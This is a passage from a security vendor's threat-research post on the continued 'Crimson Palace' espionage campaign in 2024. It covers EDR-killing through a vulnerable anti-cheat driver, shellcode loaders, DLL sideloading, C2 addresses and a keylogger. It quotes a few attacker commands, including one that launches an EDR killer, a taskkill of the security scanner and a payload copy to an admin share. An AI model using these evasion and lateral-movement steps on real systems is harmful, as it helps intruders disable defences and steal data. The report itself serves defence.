data-contrast=\"none\">December 2023: Collection and exfiltration<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">In December, the attackers launched a range of reconnaissance and collection efforts. This included capturing administrator credentials and data for specific users, as well as pinging user accounts and machines that we observed the attackers reconnoitering during\u00a0 <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-discovery\"><span data-contrast=\"none\">previous Cluster Charlie activity in June 2023<\/span><\/a><span data-contrast=\"none\">. During this time, the actors were conducting targeted espionage activity in which they were capturing sensitive documents, keys for cloud infrastructure (including disaster recovery and backup), other critical authentication keys and certificates, and configuration data for much of the agency\u2019s IT and network infrastructure.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h2><span data-contrast=\"none\">2024: Picking up the tempo<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"none\">In 2024, it became apparent that the threat actors had begun to rapidly cycle through C2 channels to maintain and manage persistent access as Sophos discovered and blocked existing C2 implants. They also changed how they deployed malicious payloads. From November 2023 to at least May 2024, the actors in Cluster Charlie deployed C2 implants using 28 unique combinations of sideloading chains, execution methods, and shellcode loaders.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The reasons the actors were rapidly rotating their C2 channels and their deployment methods are likely threefold:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"5\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"none\">There is evidence the actors were testing to see if different files and deployment methods would be detected by Sophos.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"none\">Rapidly rotating C2 channels and deployment methods can make it more difficult for defenders to keep up with and block.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"none\">The attackers were responding to our actions to block them, sometimes re-establishing access within 24 hours and deploying a modified, unique sample in fewer than four days to evade deployed blocking detections. <\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<figure id=\"attachment_957277\" aria-describedby=\"caption-attachment-957277\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957277 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png\" alt=\"Figure 4: A timeline of the continued threat activity in 2024\u00a0\" width=\"640\" height=\"361\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png 2255w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=300,169 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=768,433 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=1024,577 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=1536,866 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP_2_image4.png?resize=2048,1154 2048w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957277\" class=\"wp-caption-text\"><em>Figure 4: The continued threat activity in 2024 <span style=\"font-size: 1em\">\u00a0<\/span><\/em><\/figcaption><\/figure>\n<p><span data-contrast=\"none\">In January, we saw further targeted capturing of user documents and Viber for Desktop communications databases, capturing internal chats at the organization. The attackers also took measures to disable endpoint protection software or evade detection when it could not be disabled.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">January 2024: RealBlindingEDR<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">In January 2024, Sophos MDR observed the actors deploying two slightly modified samples of <\/span><a href=\"https:\/\/github.com\/myzxcg\/RealBlindingEDR\"><span data-contrast=\"none\">RealBlindingEDR<\/span><\/a><span data-contrast=\"none\">,\u00a0 an open-source tool designed to &#8220;blind&#8221; (or kill) malware protection and endpoint detection and response (EDR) solutions. Ironically, the actors <\/span><span data-contrast=\"auto\">ab<\/span><span data-contrast=\"none\">used<\/span><span data-contrast=\"auto\"> a malware protection product <\/span><span data-contrast=\"none\">to execute the EDR killer to create an execution chain that would appear to be &#8220;safe&#8221; to other malware protection tools, similar to how previous \u201cEDR killer\u201d malware has <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/04\/19\/aukill-edr-killer-malware-abuses-process-explorer-driver\/\"><span data-contrast=\"none\">used trusted Windows components<\/span><\/a><span data-contrast=\"none\">.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">To illustrate how the attack chain became more complicated, here is how the adversaries launched the RealBlindingEDR binary asoc.exe:.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">First, the attacker ran a batch file (33.bat) that executed the following command:\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">cd c:ProgramData &amp;&amp; c:ProgramDatakaba.exe run run-cmd \"c:ProgramDataasoc.exe -cccc\"<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">This command leverages kaba.exe, a renamed version of a legitimate Kaspersky executable, to load the RealBlindingEDR sample, asoc.exe.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Once executed, asoc.exe first attempts to check whether the echo driver is loaded. If not, it will try to load the driver ProgramDatamico.sys (a renamed version of echo_driver.sys deployed as part of the RealBlindingEDR kit) and fetch its handle. The binaries exploit <\/span><a href=\"https:\/\/ioctl.fail\/echo-ac-writeup\/\"><span data-contrast=\"none\">a vulnerability in an anti-cheat tool for Minecraft called Echo.ac<\/span><\/a><span data-contrast=\"none\"> (CVE-2023-38817) and use that tool to <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/10\/04\/blackbyte-ransomware-returns\/\"><span data-contrast=\"none\">remove kernel routines<\/span><\/a><span data-contrast=\"none\"> used by a number of different EDR products, which allows the actors to escalate their privileges through token theft. Echo.ac was deployed in this and other cases as mico.sys. The attack then uses the same technique to remove the kernel callbacks CmRegisterCallbacks and MiniFilterCallbacks, both of which are kernel functions that many EDR products use to monitor system activity.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">After RealBlindingEDR removes these kernel routines from memory, it will unload the Echo.ac driver (mico.sys) and run <\/span><\/p>\n<pre><span data-contrast=\"none\">taskkill \/IM SophosFileScanner.exe \/F<\/span><\/pre>\n<p><span data-contrast=\"none\">to kill the SophosFileScanner.exe process. To signal the operation succeeded, the binaries will create an empty file in C:UsersPubliclog.ini. The presence of this file indicates success.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Another RealBlindingEDR sample discovered, ssoc.exe, has an additional capability: It uses a <\/span><a href=\"https:\/\/www.trendmicro.com\/de_de\/research\/23\/e\/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html\"><span data-contrast=\"none\">known technique<\/span><\/a><span data-contrast=\"none\"> to try to crash EDR processes, by creating a Registry key named SophosFileScanner.exe in the path SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options, and creating a string value named MinimumStackCommitInBytes inside of it.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos also observed the actors\u2019 attempt to use an open-source tool called <\/span><a href=\"https:\/\/github.com\/weak1337\/Alcatraz\"><span data-contrast=\"none\">Alcatraz<\/span><\/a><span data-contrast=\"auto\">, which is an x64 binary obfuscator. Between February and May, the tool was detected (as ATK\/Alcatraz-D) at the location C:ProgramDataconhost.exe and prevented from running on four separate occasions by Sophos.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">February 2024: Testing tactics and tools<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">After Sophos expanded its detection coverage of the Havoc C2 framework, the threat actor began rapidly cycling through a number of C2 implant options. They deployed the <\/span><a href=\"https:\/\/github.com\/INotGreen\/XiebroC2\"><span data-contrast=\"none\">XieBroC2 framework<\/span><\/a><span data-contrast=\"none\"> as a backup. At the same time, the actors appeared to be re-crafting their deployment mechanism.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">One of the mechanisms they turned to was <\/span><a href=\"https:\/\/github.com\/TheWover\/donut\"><span data-contrast=\"none\">Donut<\/span><\/a><span data-contrast=\"none\">, an open-source tool that generates shellcode injection scripts designed to evade security tools. Donut can load a malicious payload from memory and inject it into arbitrary Windows processes. The threat actors were observed repeatedly using Donut-based loaders to drop C2 implants, frequently dropping variants of implants within hours of each other on different hosts.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">On February 1, the actors appeared to conduct a form of <\/span><a href=\"http:\/\/ttps\/\/en.wikipedia.org\/wiki\/A\/B_testing\"><span data-contrast=\"none\">A\/B testing<\/span><\/a><span data-contrast=\"none\"> of malware, deploying two different malicious DLLs with the same name (msntlm.dll) within two hours of each other. Both DLLs contacted the same C2 address (<\/span><span data-contrast=\"auto\">141.136.44.219, geolocated in Cyprus) at the domain name gsenergyspeedtest.com, which matches a domain naming pattern used by<\/span><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/k\/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\"><span data-contrast=\"none\"> APT 41 subgroup Earth Longzhi<\/span><\/a><span data-contrast=\"auto\"> and Cluster Charlie in previous activity.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Both malware DLLs were Donut shellcode loaders. One of the samples decoded and injected Havoc Shellcode Dropper into svchost.exe, which in turn injected an embedded Havoc payload into memory and executed it. The other sample decoded a Havoc Shellcode Injector that injected a Cobalt Strike Reflective Loader into svchost.exe.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">On another occasion, <\/span><span data-contrast=\"auto\">27 d<\/span><span data-contrast=\"none\">ays after the initial A\/B test, we observed the actors sideloading two versions of a malicious file (libcef.dll) by abusing the legitimate Java Chromium Embedded Framework Helper (jcef_helper.exe). One libcef.dll sample deployed XiebroC2 via shellcode from <\/span><span data-contrast=\"auto\">Donut (connecting to 64.176.50.42:8444, geolocated in the United States)<\/span><span data-contrast=\"none\">, while the other deployed an encrypted Havoc payload embedded in it, which upon decryption reaches out to attacker IP 141.136.44.219 \u2014the same C2 address in Cyprus used in the February 1 incident.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">In total, in February and March 2024 we saw seven deployments of libcef.dll using jcef_helper.exe, in some cases renamed as C:PerfLogsconhost.exe and in others without renaming.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">February and March 2024: Bringing along a helper<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">On multiple occasions, the attackers brought along a vulnerable executable to sideload malicious DLLs.\u00a0 In February, they brought along the malicious file c:perflogswsoc.exe and moved it around within the target environment to create processes for injection. SophosLabs determined wsoc.exe works by creating an instance of Microsoft WMI Provider Subsystem Host to run WmiPrvse so it can then inject into it. In this case, it injected libcef.dll into WMIPrvSe.exe<\/span> <span data-contrast=\"auto\">as another layer of obfuscation. The commands appeared to be a form of testing by the adversaries.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In March, the attackers made further adjustments to implants. in early March, the actor leveraged jconsole.exe to sideload the malicious DLL jli.dll (actual name: <\/span><a href=\"https:\/\/github.com\/florylsk\/ExecIT\"><span data-contrast=\"none\">ExecIT.dll<\/span><\/a><span data-contrast=\"auto\">, the ExecIT shellcode loader). Once the actor sideloads the ExecIT file, the file checks for the presence of a log.ini file in the same directory before reading the log.ini file and injecting it into its memory. According to analysis by Sophos X-Ops, jli.dll also checks for different debuggers (scylla_x64.exe, ollydbg.exe, idaq64.exe, Zeta Debugger, or IMMUNITYDEBUGGER.EXE) and different monitoring and analysis tools (Unpacked.exe, reshacker.exe and others).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">\u00a0Attackers dropped the sideloaded DLL through lateral movement from another compromised device, and the implant was observed generating outbound network connections to 198.13.47.158:443 (geolocated in Japan). This IP address was used previously in March 2023 by Cluster Charlie threat actors as a C2 for a PocoProxy backdoor sample.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The threat actor moved laterally by copying the jconsole.exe, jli.dll, and log.ini files, and then created a remote scheduled task to execute the payload on targeted machines. Jconsole.exe was observed generating 131 different discovery, lateral movement, and indicator removal commands. Shortly after, the malicious jconsole.exe process executed from the remote scheduled task and made a direct IP connection to 198.13.47.158:443.\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The attackers shifted to a Donut shellcode loader again on March 11, once again abusing jcef_helper.exe to sideload a <\/span><span data-contrast=\"none\">Havoc C2 implant (libcef.dll) alongside the file log.bin. The log.bin file acted as a trigger for the implant; the shellcode only injected the implant and made connections to the actor&#8217;s C2 (IP 45.77.46.245:443, geolocated in Singapore) when log.bin was present.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">April 2024: Deploying tattletales<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:160,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">On April 8 and 12, the actors conducted three different sideloads abusing the legitimate identity_helper.exe component of the Edge browser to sideload malicious DLLs named msedge_elf.dll. This DLL is a Donut loader carrying a Havoc C2 payload in the form of a binary file, which it injects into memory upon decryption. In two of the cases, the encrypted accompanying Havoc payload was deposited in C:Windowstemptemp.log and connected to the C2 host at 64.176.37.107:443 (geolocated in Canada); in another, it was dropped in the same location as the DLL with the name log.ini, and it connected to 45.77.46.245:443 (geolocated in the United States).\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">On April 10, the actors used another renamed jconsole.exe, this time renamed firefox.exe, in an effort similar to the March ExecIT attack. The shellcode loader in this case was not recovered, but the Havoc implant injected into firefox.exe and connected to 64.176.37.107:443, just as two of those injected by Donut loaders had. On April 12, a fourth attempt to leverage identity_helper.exe\u2014this time renamed as fireconf.exe\u2014was immediately stopped by Sophos endpoint protection.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Around the same time, the actors deployed a shellcode loader variant of msedge_elf.dll as a standalone executable (pp.exe).\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"auto\">cmd \/c \"copy c:userspublictemp.log \\172.xxx.xxx.xxxc$windowstemp &amp;&amp; copy c:userspublicpp.exe\\172.xxx.xxx.xxx c$perflogsconhost.exe\"<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"auto\">Also in early April, we observed two different keylogger tools being deployed to the same host at the same time, one of which is a previously unreported malware we&#8217;ve named TattleTale &#8212; a keylogger with additional capabilities. We observed use of this tool as early as August 2023 but were previously unable to capture a sample. The keyloggers were deployed to specific target administrative user accounts and other accounts of interest. <\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">TattleTale was deployed as the file r2.exe and was created on disk by identity_helper.exe. According to analysis by Sophos X-Ops, the malware can fingerprint the compromised system and check for mounted physical and network drives by impersonating a logged-on user. TattleTale also collects the domain controller name and steals the LSA (Local Security Authority) Query Information Policy, which is known to contain sensitive information related to password policies, security settings, and sometimes cached passwords. TattleTale\u2019s keylogger capabilities include collecting storage and Edge and Chrome browser data, saving this collected data into a .pvk file named after the victim organization. The keylogger output is hardcoded into the sample, so its output directory will potentially vary from sample to sample.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<figure id=\"attachment_957278\" aria-describedby=\"caption-attachment-957278\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957278 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png\" alt=\"Figure 6: A screenshot of the TattleTale malware command line.\u00a0\" width=\"640\" height=\"356\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png 1140w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png?resize=300,167 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png?resize=768,428 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/cp_2-image_5.png?resize=1024,570 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957278\" class=\"wp-caption-text\"><em>Figure 5: A screenshot of the TattleTale malware command line<\/em><\/figcaption><\/figure>\n<p><span data-contrast=\"auto\">The actors deployed the keylogger r1.exe alongside two drivers, C:userspublicrsndispot.sys and C:userspublickl.sys, to temporarily disable EDR telemetry. r1.exe is executed by a file named 2.bat and establishes communications to a loopback address. r1.exe then accesses protected Chrome database files.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">On the same target admin system, the actors also deployed another keylogger (\u2018c:userspublicdd.dat\u2019), the output of which would be saved as .dat files (\u2018C:UsersPubliclog.dat\u2019).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">June 2024: Cloudflared<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">On June 13, in another move more reminiscent of cybercrime intrusions, the actors used Impacket to install the Cloudflared tunnel client on a single device. Prior to the installation, they were able to disable endpoint telemetry from the targeted device, so the deployment of the tunnel went unreported until incident response reactivated endpoint protection later that month.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h2><span data-contrast=\"none\">(No) Conclusion<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">The intrusions and activities documented in this report continue. We continue to see signs of the threat activity clusters we identified in our initial report as they attempt to penetrate other networks of Sophos customers in the same region.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Throughout the engagement, the adversary appeared to continually test and refine their techniques, tools, and practices. As we deployed countermeasures for their bespoke malware, they combined the use of their custom-developed tools with generic, open-source tools often used by legitimate penetration testers, testing different combinations.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This cyberespionage campaign was uncovered through Sophos MDR&#8217;s human-led threat hunting service, which plays a critical role in proactively identifying threat activity. In addition to augmenting MDR operations, the MDR threat hunting service feeds into our X-Ops malware analysis pipeline to provide enriched protection and detections.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The investigation into the campaign demonstrates the importance of an efficient intelligence cycle, outlining how a threat hunt spawned from a raised detection can generate intelligence to develop new detections and jump-start additional hunts.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Indicators of compromise for this additional Crimson Palace activity are available on the Sophos GitHub page <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/crimson_palace_2.csv\">here<\/a> . <span class=\"ui-provider a b c d e f g h i j k l m n o p q r s t u v w x y z ab ac ae af ag ah ai aj ak\" dir=\"ltr\">For an in-depth look at the threat hunting behind this nearly two-year long cyber espionage campaign, sign up for the webinar, &#8220;<a id=\"menur4j4\" class=\"fui-Link ___1rxvrpe f2hkw1w f3rmtva f1ewtqcl fyind8e f1k6fduh f1w7gpdv fk6fouc fjoy568 figsok6 f1hu3pq6 f11qmguv f19f4twv f1tyq0we f1g0x7ka fhxju0i f1qch9an f1cnd47f fqv5qza f1vmzxwi f1o700av f13mvf36 f1cmlufx f9n3di6 f1ids18y f1tx3yz7 f1deo86v f1eh06m1 f1iescvh fhgqx19 f1olyrje f1p93eir f1nev41a f1h8hb77 f1lqvz6u f10aw75t fsle3fq f17ae5zn\" title=\"https:\/\/events.sophos.com\/operation-crimson-palace\/\" href=\"https:\/\/events.sophos.com\/operation-crimson-palace\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"Link Intrigue of the Hunt: Operation Crimson Palace: Unveiling a Multi-Headed State-Sponsored Campaign\">Intrigue of the Hunt: Operation Crimson Palace: Unveiling a Multi-Headed State-Sponsored Campaign<\/a>.&#8221; \u00a0<\/span><\/span><\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/09\/10\/crimson-palace-new-tools-tactics-targets\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/shutterstock_2458057241.jpg\"\/><\/p>\n<p><strong>Credit to Author: gallagherseanm| Date: Tue, 10 Sep 2024 10:00:54 +0000<\/strong><\/p>\n<p>Chinese cyberespionage campaign renews efforts in multiple organizations in Southeast Asia, blending tactics and expanding efforts\u00a0<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[31504,27718,31878,31506,129,31879,24552,27030,31509,16771,31880],"class_list":["post-25195","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-backdoordiplomacy","tag-chinese-apt","tag-crimson-palace","tag-earth-longzhi","tag-featured","tag-ref5961","tag-security-operations","tag-sophos-x-ops","tag-ta428","tag-threat-research","tag-unfading-sea-haze"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/25195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=25195"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/25195\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=25195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=25195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=25195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}